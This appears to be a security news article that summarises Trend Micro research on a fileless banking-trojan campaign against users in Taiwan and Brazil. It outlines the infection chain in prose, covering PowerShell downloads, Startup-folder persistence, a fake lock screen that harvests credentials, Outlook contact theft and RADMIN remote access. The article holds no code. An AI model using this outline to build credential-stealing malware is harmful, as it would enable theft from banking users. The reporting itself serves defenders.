Security researchers have discovered a new fileless malware campaign aiming to steal users banking credentials and outlook contacts.
The new campaign was discovered by security researchers at Trend Micro labs and targets online banking users in Taiwan and Brazil.
The fileless malware with multiple.BAT attachments is capable of opening an IP address connection, downloading a PowerShell with a banking trojan payload, and installing a hack tool and an information stealer.
The malware attempts to steal user’s banking accounts details from the websites user visited. In addition to that, the malware also gathers business email address and tries to gain remote access to the target system.
Chain of Infection
Upon infection, the fileless banking trojan connects to a remote IP to download the PowerShell codes and executables to connect with other URL’s.
In the next step, it drops a .LNK file in the Startup folder and forces the system to restart after 3 minutes and also creates a lock screen forcing the user to enter their user name and password.
By using the system’s security login feature it verifies the credentials entered and sends it to the command and control server. Immediately after this it hides its malicious activities by deleting all files and folders created in the startup folders.
At the same time another trojan open outlook and gathers the email address stored it in and sends to the command and control server.
Researchers also discovered the malware also installs a hack tool RADMIN and attempts to gain full access to the system. Once the user logs off the attacker will be able to access user logs, gain admin privileges and shadow screen activities of the user.
After the reboot and user logs in, the malware deletes all the Google .LNK files and replaces it will malicious files and hides as a Google Chrome extension.
“In addition to stealing online banking credentials and remotely accessing systems, gathered email addresses of businesses’ and users’ contacts can be used for mass mail targeted attacks. In potentially having large directories of email addresses to choose from as targets, spoofing roles for phishing and BEC campaigns can incur more losses for legitimate users and business owners.” said in the post published by Trend Micro researchers.
You may be interested in reading:Several Photo Editing Apps Found Stealing Users Photos